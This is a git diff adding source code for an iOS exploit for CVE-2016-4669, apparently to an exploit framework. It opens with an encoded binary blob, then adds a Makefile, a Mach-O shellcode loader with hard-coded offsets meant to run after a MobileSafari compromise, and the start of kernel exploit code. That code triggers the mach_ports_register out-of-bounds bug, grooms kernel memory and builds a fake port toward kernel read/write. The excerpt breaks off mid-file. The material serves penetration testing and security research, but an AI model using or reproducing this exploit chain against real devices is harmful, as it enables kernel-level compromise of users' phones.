zmT;>h8dw;LwFaV&aJY^kI3nTbU~HhlF(j|Q!4U~X0whBDy(b!K4RFE3XIx(CsBdXi
zDqU9P`nvP(@n8Si-81i=f8E{7W?nmmHT&y>zGcn6Xu#j#3oi>q^%5%`O@T%#d+*Xp
z$Kt3WL|=ecT$Yy>qc5#RlR>^%pw(9&ZfOlHZ`I=v2{rf{!%<(WKekvOKdm8D-+JS;
z#eo$!`ln5#pK1PR)W70JHm$+m>UW?_v%mFg<-x%6@*A&qRxQ_uX%i_AvQAXXfG25e
z=A8L~=(13KVD8eorcey~x?$+0#Q6LT4L&qSs4-OUZw-Z8eBp2tR|sHN65#(N_YnAF
z;ihE)$3H7EbIv#X)b?|M&@jb^B<pb>Chw4BJu}#-|D=>IqgGyN&Ce;Orfazy0{*6^
zFyIS(P7z(EX2o{J-{D#CQ`N)rnBu21r|6`_mc}B1mIjC4(HbOAWy>Z_zQmV9Rk{-O
z$cCOlog}7uC%IwF*AxyfUK&Za?D9Oe5S_5mzgW$yY15!YD_xQIw@OF2u@QPYr=ZMW
z_iYS8t#m#XYYH_4C|6a}^1*7+yOt~s#9D`V7}o)=^)KdB@ma2D7K&&xW2g;v4bzdB
z;?FA_aBb?k$Q1BLn^rg$2cj*3CJa0nOw=JsXAk-*;JGBDQt73!swk!Rsx|P4Sj1mX
zFrd!Z(nuicBZR1raYYF8*2aiaS8+5DTiP5LY+)J^d}?dQG&L6nS}9vd)7ue<Mq9$D
zrvbJ$VsLddg_=V&U^O)@SH2kRi7Js?hOP*b94&!+FbZcDWvIw;wM#KN8fXr~k(vT6
zN<D)u&+`mMgyEu&t79zYUxs13H4M7ap$>@AfI0#zT}8!$cNI-7WY>BRFrX|t_X)LN
zm}>P!Lkol2=n2DG8bU1#9gCG>6RI4|fmqDHP@4=;c^(5i;V2rqJ`h?)dBZK5e<Kk-
zdM7#Ro$5@&Ysb*1sWb@gB~wkMqfwd1Ds^xwnG`9S06#!%U=tex%P;`P7CU2;Vv|^~
zF~%mc=J3)M%@io8q7w~MSByE7L_ipwcn`ZIF3cv@g<2*yvq(4=TJD3V-J@x&G*B!U
zXlima1R_o06@do8)YPbRJcT9KA|HWsQfed`u2)&^y@L_tr-}yfIg(!KSf~;#;%}`F
zQs>9a9a|iVL;?+EWsapWf;s4qHq?h3U;%~<cv+0G+vd%_Bh(t4-x@`Rsf^|);%jI|
zY-x?nX+(yp3{JMNHOOL0E=s>`fwxL4Q@5fOL)qNwZ_b`m?eQVMZ|>~snww_KneDl0
z9#$;I$3Vb9;Qx07I=%F;IQY5Y1IBjpxZU{Oi_nE|kjD+?WNg|;jJ+h`F&JSl!eN9D
z5F~_85v;w86(cwhDiNv>JP30U?m`G6v?8=2tVM_;JdKb**oLqh;UGdc!YKq9!IH#j
zDncp3c!VhkE`-?#cOo<(L=aXYtU=g-um#~+gqIO^B6J}fMd(2|hrnQm4WR^~0>Ozu
zpJIfHa|)?_%_ZW&ov=wzaVr5&d4BMTn#Ga9lZ?H1gIV`cWc0oZUAYX(b9R_KUw98T
z=<*Dwiw}98)#<Vi{8<FbYv+}cj-kIX_9#MTyk7Uu()Cr8vzt_Vcjqv+8TgFkvWb5l
z{AeA&3p~l952gP#BRvVeNKIDKEztEU9bX0BspCW7FVpeg0k5y`Dew+m`ftEruH(Oa
zp0O|K_*LL1>G&Psuhj8pGWZI#&3Ik<e}LEP`#AUtUHUJ<6Xx_G`wxO2tFj88-8WSK
zFMu!ArBBUBzcnMh1-xGVcfs3q<u`y=_QiPpuYs@BrJn>}tmB!?XbW5UkiNy>HQyor
zYVi8{ZUkSZ%U=urG9AARyuSQ*!Ry<*1H8WeUx2sj%KrxZ7#+VKyk5T#!Rzs49}jKs
z67c%;>ofRUz-Q~^-v(aq&q45d{a1k3>;EWtz5Jhm*W>#(_%G<>_ktg%<1f1~w7n;T
z&()<*1MkrB-v+PuuLr<iu1kL&ydKY;;PrSN2Cug-34XM$d@jbWLLFa{!GAG>|4Igb
z6L>vdw}T&}lNSN6^*<Nle+d2;2yY<lMR*@U{}DT@+JcW?-v*&=&VOIoR)z4=_9}(f
z=QC&n0RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU8
z0RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU80RsU8
z0RsU80RsU8f&Wbi6qQ>ewt3YHJheBtBldZ2`j39KFu!JgjmouoY`5Xxzq)+4c;?{}
zq55#Nf!!Ld5?wyuE%R|932shm4NPwe*ZG^=xXx)YYda@wadny;TWW{qncwQKU(B=g
zd@`VZ1j^%!QIfAdxY)OFDK0}{Z5Bi;m)|JY`Y6|~ur@0qarIaPx7PS#p?d?Y%`R5^
zmW7wr2XSSPlD#>$kgg6>1T?H@YJlXWbv|4GgL_w4TPLq{KoCc|d~@8hYJ4@btLM-6
zRlpPv?pR@MVgV}2NWtAHtW6#)OB&aBVLH@qX;trAscG`ZV)FuxfoPzm9-3|G(+upa
zv5BKDk*Su#zi$<bNnE&YQN0frAH~8g{-#jt3g0p(a7=14pp%jV=FP`FKCG=$gfm7x
zkbBGg+2Mt_!8ketP2^MHrM!W9+@BPSg%-9@+U!fxaKR2P#0gO1TuQvH<sN|Ko4;uG
zBHuiI#T+FrxHOUOU81BrGm~y>(JrT><hv-@r(7vSY^}mJ2b$45)Y25!pvHw8VxjAa
z4=Q{tf=h2&8?{VLYGm3&=n5*z96@}&a(@tUt;CW0`C?6hK*ZM?^+zavxf-upx)Mx7
zQ*1>urL+m)0?R|K#H=Q!F&a<|TSE-4Yr@?<l(v?$>b+1DBk~yB@<Z$fViosOtcB0f
ztv!?yPp1UKxXz3Gn4&kQqtT!gu|*%@YrxfC(eMgNcsiXh<Q6DO+B!5zSLoTHDf-)>
zs9<7f@^E*JQMQ+cW>cC?y^xPmUmlXG-IGQs+cHx0KGB&@Q*Y`@BeFA{K$joV6@T>s
z-@<y5w_8o3`>%-ItFVe25!<D(p@jfV@db=fk){>O{b7`RP)kO0W+WZfk|Ikpla4A$
zbmbJu=q8RX>mud@V)U1%QDl!A8Bx6Fl)?;NHbogEic>D419OfTz&YqovJ%r8ZCI-K
z?5CW?^-ff{%|!WEv?%7UCPshP8Rb}`L@GDkp%$%wuGPiz3-KtkNYP7MnnEo~AKYLn
z`iwCYdE=D#9)GA67E{^H3Qu=Pg2SbkKHPU%=ws0s6NRM_+){;sIemW{`?YBy+h%I^
zv$sqkw%XjterI0HUbU$0#Gc4%VDDw&LdJ%r%@KAiJHk$9)8%PE-A8w5`J(JZ&X6k&
z*IJpWIfy<Rs9%bjg1C?lqxxECvD!q}kTNqy{sa`!E|6oNn(1~g^vzHUdkCd{Y!{OC
zI`-q*PGv%=TiS@hTXCEilLeg_{epVqn@_nHjvdajuqQvl-RA7?_-3X{?M}dE+>%K>
zHiq_4@9SiHQSO=ZRPKJ6%GI;oCO9Q~(qdsRs4+nw`>P46?#g1Op`~%XWF3=DnEhBB
z*O&ee@>|&3ACsJzdRZP_r^bF|{`?y%**X;Np!;D_O@oj9*^Ik1!>u%Z@~iXM0bVzp
z90DbCs70Y-EM>N^Pf*mtF17(}lj6=#SX#qA<z~L$z>L4Fri8`*SW^_kFm5(vFId!Z
z3pe?(_i`-kzrJfC;2uUkbCeyh+;jb8CTSk=<7{T4%NqY?LF@_0dvL8uaQavZ<hzei
z!RMZ!3XuA6)}Y)@0NXB7!tzPT{X->*ZHBOBT+`@V-rU4q%2FqaSCI9wc9Jx(j=q1p
zfxh?P(pw8V{(JiF+fLsDJ4nIsJuOXP=(8$26syOw#K*79V}H+9u8YHp1TIB)v*E9*
zv8S>v?DspV^!Ikr_iuJ9GQv&Vr~Z_!_!;gA<q_{>SJADZock+^|7Z^te048<A5*>u
zl<yDsk#*D_t8#GpoN@yy^~eu$$fY08iTT)bAk{l8*^hEmV}A;~pMQ&FoyIpg-0yhG
zVPtNi*?(`2a_uEMfUK|niL(Azmr}X%{pbBeKY4%(-^0%3gxLk;dlx(eAEfV9hv@s=
zKht;TV-|ex#5XhRZteWFRdJMUR`v4Fci@1#m7IGYvk1C7ME`_@E+ye0i9ipVy<0eJ
za!!uyGS@v|K5Bl`^uAD4@wo7ma9HRP8dkn9*k8flbl7@LrF+5H^3e_Dqf09vH?0vm
zk-o*WXtVjclEzs#&TaHWZk%yII4B%}*W)gpjda(Hz_#Kd=r7{V-toBKrcki5)jJuR
z!Rc+F7je4f4aOeR=sk>W;<SYOn-ZKZ#eGYE;Pl;~-{bU)pwDx9FX((+azk~U0bRjq
z3+`5$#_1sF+c^CQ=p~%q0{UT2Zv*`_=qt^Pi4tQkQatdQfjgDnAUa>Yo9bOoJ8?JE
zc}{yk+i}qh<yipw-#AV8P<c7s3fj+Ux_fFRr{kc%$7#B6>P1d(1HF&aU7&k7-2>X3
zr`E-Achr@frhBBOa@qm<cA{~4%;s!?)pB|(=tV^1(w&z<M>xF=G%izB;yXdZFWCrO
zY(saLK?EBCY<qyu7dgH46=18-NOj@fF&_Vw4{-k&r|;XtSTm>B?q=+MPMb~wb1lz5
z82(_9Du49<0Dn&3_&#I5<n+o;#&&S}!fT8j;B=~+F}g#XbaQTF>^P@?{5oS7IDM!G
z_y52<DbEL}Yb4RIi|%2&p2x=_vzpV5$a5Q~x4@Q#oSugG`#61c7h|hAZ2|o#r|q!u
zDNa|t$=Fs-Kl=yV$;0V7==letp#$9k_g7BSU2w-aO?ScxXaLGXcf;9<hW@)Db2O)$
zjxqfC7&U$Z=!u+eguT-^y$$g*IbDwUJ2+hopaPtpaDuUAoW2Y3m_wAh?)y7q9h~0q
zTl7axcZ2Ta^a0pH0~qOc6m9w*r|;Z>d(t@Fy%R$g`V-}0$Uho1%*6lDU#0PlJGE3A
zr5L+W7k`^BKBUr0+3)D+r*!l$bo3iK`lycX)zNttMH!{uN|jdR(|zTdo;5o98!C-&
z+%cz%kLl<Kb#z=uZ_&{&>geC<=uREIOGoe3(Fb+(-*ogb9eqJZ=VcArQmmt|(a}?N
z^fz>LKu15Qqc`j5=XLZ>9sQ1uKBl8T(b4AYLEZ9o^f(=TgO0vgN6%AfSjt$fF1}Gm
zx9aG7b@X?2^kX_YuA{f;=&d^X7dm>Ij{c*L{;Q7uA06GR&@RQta&iW3x9jN3b@ZLE
z?Jk6GlZ^;|ggS%<gaAS#LJ%Q@uo$5UfyUexgfKz`VF^MMA%@V3uoPh#!aWGf5mq4F
zi}0TaD-r$=!hHyB2=^mAfUpW-HNt}k4<URP;bDYF5FSNXi|`o2;|Nb6hzRWn>k!r>
zY(RJt;d=;igboB6_wjKdwE6J05MdDlK5Z1fLlmdA-={#_fk1NBApCE}$H9C<p3$)7
zGu*=uqAz_;Le@*3=6veYA+7Eir)gEMu4r`;>7_j${ORgu=EIKGkVU$$L0iA4DRr&x
zqidLb>E{}iRURjlM;>K$J@lD~b|Pp)$ftj_Q6dJPLhv}MKFRw2*)9IQkp7VkGHGkW
zr+*gE;s&1%w3v)X2;br;9)|Euk4@^2)0d8Ms!xV=jXDzPQERxiQ64ST1Uz2qR_^II
zRl3rwm;B`iE)wzT`W}Vw0INJQYK=yy`uMYn`YfqWiP5$l9z}RcI-mYI2M^KueSt8`
zh`5K*ehO~Or;FM7W4aP^>65(@t$Vm9e&~*XPq`7C+cB6ERT9R!2<^#tIM3GYmGd3i
z%uQuwyE!wG?+Rx|(+2eLd%GF2+OF<rZO!ZBb=&cuvHhDFt!yj}jnr-VqKp5NP4V=0
zFbxue8^Oe>Tfm@(+XzRreovU#p}WCDV$>4^ZEN__O<~R7)Qw<u2Uy+u)%JYpmv7Dy
zNxQsiUl_8zt40m(>#96$=%%UkPOciG4i?(qywJsId$+o%A)B_k_+fWzb?N$T+QI1b
z{;WPKy)&go>P}jCgu0=qY+9=^L-%G8r)<jdwuITkZ^J6_8T+qFT*k&LynuFGhn{q(
z8?P7~2LJAhI#l3Wx5ujW&cTMm7CLRG(q=sEqpBOILw8R3o)^lho~`XktA9L%X`7@&
z&zy!oZ%S{H@?r3jvnRM{#suQ4Q;sV_Ez81-G5mdgx({PF+<tItlMg<bLgvh$e~&*h
zv!#^=dzy+d&1KeeNu(<L(&+1l72%sg(e>fT3QT!TwAZRuK(XABFHN{a_=GCw@M0!Z
zP5Mkp6RL){YC=^NmARx6-{c9CoL^=RIs|m6%Es9Ani_Qa`aq-=-cZ*Rn5@{N+5r9Q
zqoGJE{e>ZHN<*d^k0ZH2)ZgS=s2p<+#t+RuVUnWWaH1wm`pjA;d|6j&XhjpgtTe%}
z0>6C2pc<K_6f}k{b%O%#a7InIL8nHBT{r0J%1EmEYz@DvwD7QMOmcqZGqs=OL~V<;
dzl5Qqlx=1-GW`XlOO|^R=;RlB_*ibU{|oVqfnNXs

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2016-4669/Makefile b/external/source/exploits/CVE-2016-4669/Makefile
new file mode 100644
index 0000000000..befefc2acc
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/Makefile
@@ -0,0 +1,23 @@
+GCC_BIN_IOS=`xcrun --sdk iphoneos -f gcc`
+GCC_BASE_IOS=$(GCC_BIN_IOS)
+SDK_IOS=`xcrun --sdk iphoneos --show-sdk-path`
+GCC_IOS_32=$(GCC_BASE_IOS) $(CFLAGS_32) -arch armv7 -isysroot $(SDK_IOS) \
+		-Iheaders
+
+all: clean loader macho
+
+loader:
+	$(GCC_IOS_32) -mthumb -shared -O0 loader.c -o loader
+	python macho_to_bin.py loader
+
+macho:
+	$(GCC_IOS_32) -O0 -fmodules -mthumb macho.m task.c utils.m shell.m -o macho
+
+install: loader.bin macho
+	mkdir -p ../../../../data/exploits/CVE-2016-4669/
+	cp loader.bin ../../../../data/exploits/CVE-2016-4669/
+	cp macho ../../../../data/exploits/CVE-2016-4669/
+
+clean:
+	rm -f *.o loader.bin loader macho
+
diff --git a/external/source/exploits/CVE-2016-4669/__task.h b/external/source/exploits/CVE-2016-4669/__task.h
new file mode 100644
index 0000000000..779022887d
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/__task.h
@@ -0,0 +1,49 @@
+#ifndef	_task_user_
+#define	_task_user_
+
+/* Module task */
+
+#include <string.h>
+#include <mach/ndr.h>
+#include <mach/boolean.h>
+#include <mach/kern_return.h>
+#include <mach/notify.h>
+#include <mach/mach_types.h>
+#include <mach/message.h>
+#include <mach/mig_errors.h>
+#include <mach/port.h>
+
+#ifndef KERNEL
+#if defined(__has_include)
+#if __has_include(<mach/mig_voucher_support.h>)
+#ifndef USING_VOUCHERS
+#define USING_VOUCHERS
+#endif
+#ifndef __VOUCHER_FORWARD_TYPE_DECLS__
+#define __VOUCHER_FORWARD_TYPE_DECLS__
+#ifdef __cplusplus
+extern "C" {
+#endif
+	extern boolean_t voucher_mach_msg_set(mach_msg_header_t *msg) __attribute__((weak_import));
+#ifdef __cplusplus
+}
+#endif
+#endif // __VOUCHER_FORWARD_TYPE_DECLS__
+#endif // __has_include(<mach/mach_voucher_types.h>)
+#endif // __has_include
+#endif // !KERNEL
+
+#ifdef  __MigPackStructs
+#pragma pack(4)
+#endif
+	typedef struct {
+		mach_msg_header_t Head;
+		NDR_record_t NDR;
+		kern_return_t RetCode;
+	} __Reply__mach_ports_register_t __attribute__((unused));
+#ifdef  __MigPackStructs
+#pragma pack()
+#endif
+
+
+#endif
diff --git a/external/source/exploits/CVE-2016-4669/loader.c b/external/source/exploits/CVE-2016-4669/loader.c
new file mode 100644
index 0000000000..4b2070ddd9
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/loader.c
@@ -0,0 +1,190 @@
+// [1] https://iokit.racing/machotricks.pdf
+
+#include <stdio.h>
+#include <stdint.h> 
+#include <unistd.h>
+#include <dlfcn.h>
+#include <mach-o/loader.h>
+#include <mach-o/swap.h>
+#include <mach-o/dyld_images.h>
+#include <mach/mach.h>
+
+// targeting a specific version of os 
+// on a specific device we can use hard coded
+// offsets 
+#define JSCELL_DESTROY 0x2e49e345
+// this one was extracted at runtime, cause
+// the one from the ipsw was not the same as on the phone
+#define DLSYM_BASE 0x381227d0
+#define DYLD_START 0x1028
+
+#define MINU(a,b) ((unsigned)(a) < (unsigned)(b) ? a : b)
+
+typedef void * (* dlsym_t)(void *restrict handle, const char *restrict name);
+typedef int (* printf_t)(const char * format, ... );
+typedef unsigned int (* sleep_t)(unsigned int seconds);
+typedef int (* _fprintf)(FILE *stream, const char *format, ...);
+typedef void * (* dlopen_t)(const char* path, int mode);
+typedef	void * (* malloc_t)(size_t size);
+
+typedef kern_return_t (* task_info_fn_t)(task_t target_task,
+	       	int flavor, task_info_t task_info,
+	       	mach_msg_type_number_t *task_info_count);
+
+typedef mach_port_t     (* mach_task_self_t)(void);
+typedef char (* strcpy_t)(char *dest, const char *src);
+
+// @see dyldStartup.s
+struct dyld_params 
+{
+	void *base;
+	// this is set up to have only one param, 
+	// binary name
+	unsigned argc;
+	// bin name and NULL
+	void * argv[2];
+	// NULL
+	void * env[1];
+	// NULL
+	void * apple[2];
+	char strings[];
+};
+
+void next(uintptr_t JSCell_destroy, void *macho, unsigned pc);
+
+void __magic_start() {
+	asm("mov r0, #0");
+	asm("mov r0, #0");
+	asm("mov r0, #0");
+	asm("mov r0, #0");
+}
+
+// In the MobileSafari part we place two arguments
+// right before the first instruction of the loader.
+// Extract them and place them as next arguments
+__attribute__((naked)) void start() 
+{
+	asm("ldr r1, [pc,#-0xC]");
+	asm("ldr r0, [pc,#-0xC]");
+	asm("mov r2, pc");
+	asm("b _next");
+}
+
+static void __copy(void *dst, void *src, size_t n)
+{
+	do {
+		*(char *)dst = *(char *)src;
+		dst++;
+		src++;
+	} while (--n);
+}
+
+// We map macho file into jit memory. 
+// The details are outlined in [1].
+void * map_macho(void *macho, void *base) 
+{
+	void *macho_base = (void *)-1;
+	struct mach_header *header = macho;
+	union {
+		struct load_command *cmd;
+		struct segment_command *segment;
+		void *p;
+		unsigned *u32;
+	} commands;
+
+	commands.p = macho + sizeof(struct mach_header);
+
+	// we assume that the loading address is 0
+	// since we are in control of macho file
+	for (int i=0; i<header->ncmds; i++) {
+		// LC_SEGMENT command
+		if (commands.cmd->cmd == 1) {
+
+			if (commands.segment->filesize == 0)
+				goto next_cmd;
+
+			macho_base = MINU(macho_base, base + commands.segment->vmaddr);
+			__copy(base + commands.segment->vmaddr, 
+			       macho + commands.segment->fileoff,
+			       commands.segment->filesize);
+		}
+
+next_cmd:
+		commands.p += commands.cmd->cmdsize;
+	}
+
+	return macho_base;
+}
+
+void next(uintptr_t JSCell_destroy, void *macho, unsigned pc)
+{
+	// structure describing the stack layout 
+	// expected by the macho loader of ios
+	//
+	// The detail are in dyldStartup.s file of dyld source code. 
+	// https://opensource.apple.com/source/dyld/dyld-421.1/src/dyldStartup.s.auto.html
+	struct dyld_params *__sp;
+
+	// resolve functions we are going to use
+	unsigned slide = JSCell_destroy - JSCELL_DESTROY;
+	dlsym_t _dlsym = (dlsym_t)(DLSYM_BASE + slide + 1);
+	malloc_t _malloc = _dlsym(RTLD_DEFAULT, "malloc");
+	strcpy_t _strcpy = _dlsym(RTLD_DEFAULT, "strcpy");
+
+	task_info_fn_t _task_info = _dlsym(RTLD_DEFAULT, "task_info");
+	mach_task_self_t _mach_task_self = _dlsym(RTLD_DEFAULT, "mach_task_self");
+
+	mach_port_t self = _mach_task_self();
+	task_dyld_info_data_t info;
+	struct dyld_all_image_infos *infos;
+
+	// We need __dyld_start address to load a macho file,
+	// We call task_info to get dyld base and use hard coded offset
+	// to get __dyld_start pointer.
+	mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT;
+	kern_return_t kr = _task_info(self, TASK_DYLD_INFO, (task_info_t)&info, &count);
+
+	infos = (struct dyld_all_image_infos *)info.all_image_info_addr;
+	void *dyld = (void *)infos->dyldImageLoadAddress;
+	void (* __dyld_start)() = (dyld + DYLD_START);
+
+	// get page aligned address a bit further after
+	// the loader and map the macho down there.
+	void *base = (void *) (pc & ~PAGE_MASK);
+	base += 0x40000;
+	base = map_macho(macho, base);
+
+	// allocate stack for out executable
+	__sp = _malloc(0x800000) + 0x400000;
+
+	// setup up our fake stack
+	__sp->base = base;
+	__sp->argc = 1;
+	__sp->argv[0] = &__sp->strings;
+	__sp->argv[1] = NULL;
+	__sp->env[0] = NULL;
+
+	__sp->apple[0] = &__sp->strings;
+	__sp->apple[1] = NULL;
+
+	// it's required to have argv[0]
+	_strcpy(__sp->strings, "/bin/bin");
+
+	// call __dyld_start 
+	__asm__ ("ldr r0, %[f];"
+		 "ldr r1, %[v];"
+		 "mov sp, r1;"
+		 "bx r0;"
+		: // no output
+		: [v]"m"(__sp), [f]"m"(__dyld_start)
+	);
+}
+
+#if 1
+void __magic_end() {
+	asm("mov r0, #1");
+	asm("mov r0, #1");
+	asm("mov r0, #1");
+	asm("mov r0, #1");
+}
+#endif
diff --git a/external/source/exploits/CVE-2016-4669/macho.h b/external/source/exploits/CVE-2016-4669/macho.h
new file mode 100644
index 0000000000..1b1ba30890
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/macho.h
@@ -0,0 +1,11 @@
+#ifndef MACHO_H
+#define MACHO_H
+
+#include <stdint.h>
+#include "utils.h"
+
+uint32_t kr32(addr_t from);
+uint32_t kw32(addr_t to, uint32_t v);
+void kread(uint64_t from, void *to, size_t size);
+
+#endif
diff --git a/external/source/exploits/CVE-2016-4669/macho.m b/external/source/exploits/CVE-2016-4669/macho.m
new file mode 100644
index 0000000000..9ded96bbdd
--- /dev/null
+++ b/external/source/exploits/CVE-2016-4669/macho.m
@@ -0,0 +1,1020 @@
+// [1] https://bugs.chromium.org/p/project-zero/issues/detail?id=882
+// [2] http://newosxbook.com/files/PhJB.pdf
+// [3] https://www.slideshare.net/i0n1c/cansecwest-2017-portal-to-the-ios-core
+
+@import Foundation;
+#include <stdio.h>
+#include <dlfcn.h>
+#include <stdlib.h>
+#include <fcntl.h>
+#include <unistd.h>
+#include <sys/attr.h>
+#include <mach/mach.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/mount.h>
+#include <spawn.h>
+#include <sys/sysctl.h>
+#include <sys/types.h>          
+#include <sys/socket.h>
+
+#include <stdint.h>
+#include <mach/mach.h>
+#include <CoreFoundation/CoreFoundation.h>
+
+#include <mach/clock.h>
+#include <errno.h>
+#include <mach/task.h>
+
+#include "__task.h"
+#include "utils.h"
+#include "shell.h"
+#include "offsets.h"
+
+typedef union
+{
+		uint32_t *p32;
+		uint16_t *p16;
+		uint8_t *p8;
+		void *p;
+		uint32_t u32;
+} many_ptr_t;
+
+
+extern kern_return_t __mach_ports_register
+(
+	task_t target_task,
+	mach_port_array_t init_port_set,
+	mach_msg_type_number_t init_port_setCnt
+);
+
+// Definitions not covered by standard headers
+extern kern_return_t mach_zone_force_gc(mach_port_t);
+extern host_name_port_t   mach_host_self(void);
+kern_return_t (* mach_vm_read)(vm_map_t target_task, mach_vm_address_t address,
+	       	mach_vm_size_t size, vm_offset_t *data,
+	       	mach_msg_type_number_t *dataCnt);
+kern_return_t (* mach_vm_read_overwrite)(vm_map_t target_task, mach_vm_address_t address,
+	       	mach_vm_size_t size, mach_vm_address_t data,
+	       	mach_vm_size_t *out_size);
+
+kern_return_t (* mach_vm_write)(vm_map_t target_task, mach_vm_address_t address,
+	       	vm_offset_t data, mach_msg_type_number_t dataCnt);
+kern_return_t (* mach_vm_deallocate)(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);
+kern_return_t (*io_service_add_notification_ool)(mach_port_t,
+			char *,
+			io_buf_ptr_t,
+			mach_msg_type_number_t,
+			mach_port_t,
+			unsigned *,
+			mach_msg_type_number_t,
+			kern_return_t *,
+			mach_port_t *);
+kern_return_t (* IOMasterPort)(mach_port_t , mach_port_t *);
+
+#define resolve(name) \
+{\
+	name = dlsym(RTLD_DEFAULT, ""#name"");\
+	if (!name) {\
+		NSLog(@"could not resolve " #name "");\
+		exit(-1);\
+	}\
+}\
+
+
+#define BAD_ADDR ((addr_t)-1)
+
+// Kernel offsets
+static struct {
+	addr_t kernel_task;
+	addr_t system_clock;
+	addr_t base;
+} koffsets = {
+	.kernel_task = 0x8038c090,
+	.system_clock = 0x80338e68,
+	.base = 0x80001000,
+};
+
+static mach_port_t master = MACH_PORT_NULL;
+static mach_port_t tfp0 = MACH_PORT_NULL;
+
+int __update_super_port(int pipe[2], off_t off, char *buf, void (^fill)(many_ptr_t *mp));
+
+#define PORT_SIZE 0x70
+
+#define IKOT_TASK 2
+#define IKOT_CLOCK 25
+#define IO_ACTIVE 0x80000000
+
+#define off(x) (x)
+#define off16(x) (x/2)
+#define off32(x) (x/4)
+
+#define KALLOC_8_CNT 0x800
+// The amount of ports we are planing to
+// decommission during allocator garbage collection.
+// Each page has 0x24 ports and we are allocating
+// one pipe per page. Sp this is how many ports
+// we will have for 0x400 pipes. 
+#define DECOM_PORTS_CNT (0x24*0x400)
+#define PIPES_CNT 0xf80
+#define PAGE_PORTS_CNT 0x500
+#define X10_ALLOC_CNT 0x10
+#define NOTIFY_CNT 0x800
+
+#define INIT_IP_RIGHTS 0x41
+
+void set_page_buffer_ports(char *buf, void (^fill)(many_ptr_t *mp, int ))
+{
+	for (int i=0; i<(PAGE_SIZE-PORT_SIZE); i+=PORT_SIZE) {
+		many_ptr_t mp;
+		mp.p = buf + i;
+		fill(&mp, i);
+	}
+}
+
+int set_super_port(int pipe[2], off_t off, void (^fill)(many_ptr_t *mp)) 
+{
+	char buf[PAGE_SIZE];
+	memset(buf, 0, sizeof(buf));
+
+	return __update_super_port(pipe, off, buf, fill);
+}
+
+int update_super_port(int pipe[2], off_t off, void (^fill)(many_ptr_t *mp)) 
+{
+	return __update_super_port(pipe, off, NULL, fill);
+}
+
+void gc() 
+{
+	kern_return_t kr = mach_zone_force_gc(mach_host_self());
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"zone gc failed: %d", kr);
+	      	exit(-1);	
+	}
+}
+
+int mach_ports_register_oob()
+{
+	mach_port_t ports[3];
+	ports[0] = 0;
+	ports[1] = 0;
+	ports[2] = 0;
+	// we've patched the generated code for mach_ports_register to only actually send one OOL port
+	// but still set init_port_setCnt to the value passed here
+	return __mach_ports_register(mach_task_self(), ports, 3);
+}
+
+// Trigger the bug and create a dangling port pointer.
+// Returns a ports list so that dangling port memory block
+// is placed somewhere amongst blocks from that list. 
+mach_port_t *setup_super_port(mach_port_t *super_port, size_t ports_count)
+{
+	mach_port_t kalloc_8_ports[KALLOC_8_CNT];
+	for (int i=0; i<KALLOC_8_CNT; i++) { 
+		kalloc_8_ports[i] = alloc_port();
+	}
+
+	// We allocate a lot of ports, so they occupy full pages
+	// after some point, later on when we free those
+	// ports, pages are decommissioned for use by other 
+	// allocation zones.
+	mach_port_t *ports_to_decom = calloc(ports_count, sizeof(mach_port_t));
+	for (int i=0; i<ports_count/2; i++) { 
+		ports_to_decom[i] = alloc_port();
+	}
+
+	// we hope this port going to be a part of a decommissioned page
+	*super_port = alloc_port();
+
+	// allocate more pages
+	for (int i=ports_count/2; i<ports_count; i++) { 
+		ports_to_decom[i] = alloc_port();
+	}
+
+	// allocate ool port messages in 8-kalloc with two super_port pointers each
+	for (int i=0; i<KALLOC_8_CNT; i++) { 
+		kalloc_8_ool_ports(kalloc_8_ports[i], *super_port);
+	}
+
+	// free every 4th one
+	for (int i=0; i<KALLOC_8_CNT; i+=4) { 
+		discard_message(kalloc_8_ports[i]);
+	}
+
+	// Call bugged mach_ports_register, which is 
+	// going to allocate space for two port pointers
+	// (grabbing a block from 8-kalloc, which is hopefully
+	// surrounded by our ool ports) and read the third one
+	// out of bounds.
+	kern_return_t kr = mach_ports_register_oob();
+	if (kr != KERN_SUCCESS) {
+		NSLog(@"could not register oob");
+		return NULL;
+	}
+	NSLog(@"oob port registered ");
+
+	// free the rest of the messages
+	for (int i=1; i<KALLOC_8_CNT; i++) { 
+		if (i % 4)
+			discard_message(kalloc_8_ports[i]);
+	}
+
+	return ports_to_decom;
+}
+
+// We check for INIT_IP_RIGHTS + 1 in ip_srights field, which
+// should have been set by mach_ports_lookup.
+bool is_port_pipe(char *buf, unsigned *off)
+{
+	for (unsigned i=0; i<(PAGE_SIZE-PORT_SIZE); i+=PORT_SIZE) {
+		many_ptr_t mp;
+		mp.p = buf + i;
+
+		if (mp.p32[off32(IPC_PORT_ip_srights)] == INIT_IP_RIGHTS + 1) {
+			*off = i;
+			return true;
+		}
+	}
+
+	return false;
+}
+
+// we always leave pipe full, after read/write
+// for consistency.
+//
+// -1 if failed, otherwise pipe index in @pipes array
+int find_port_pipe(int * pipes, unsigned *off)
+{
+	for (int i=0; PIPES_CNT; i++) {
+
+		int *pipe = &pipes[i*2];
+		char buf[PAGE_SIZE-1];
+
+		int cnt = read(pipe[0], buf, sizeof(buf));
+		if (cnt != sizeof(buf)) {
+			NSLog(@"could not read pipe %d", i);
+			return -1;
+		}
+
+		if (write(pipe[1], buf, sizeof(buf)) != sizeof(buf)) {
+			NSLog(@"pipe write failed");
+			return -1;
+		}
+
+		if (is_port_pipe(buf, off)) {
+			return i;
+		}
+	}
+
+	return -1;
+}
+
+int find_in_pipes(int *pipes, unsigned *off, bool (^find)(many_ptr_t *mp))
+{
+	for (int i=0; PIPES_CNT; i++) {
+
+		int *pipe = &pipes[i*2];
+		char buf[PAGE_SIZE-1];
+
+		int cnt = read(pipe[0], buf, sizeof(buf));
+		if (cnt != sizeof(buf)) {
+			NSLog(@"could not read pipe %x, cnt: %d", i, cnt);
+			return -1;
+		}
+
+		if (write(pipe[1], buf, sizeof(buf)) != sizeof(buf)) {
+			NSLog(@"pipe write failed");
+			return -1;
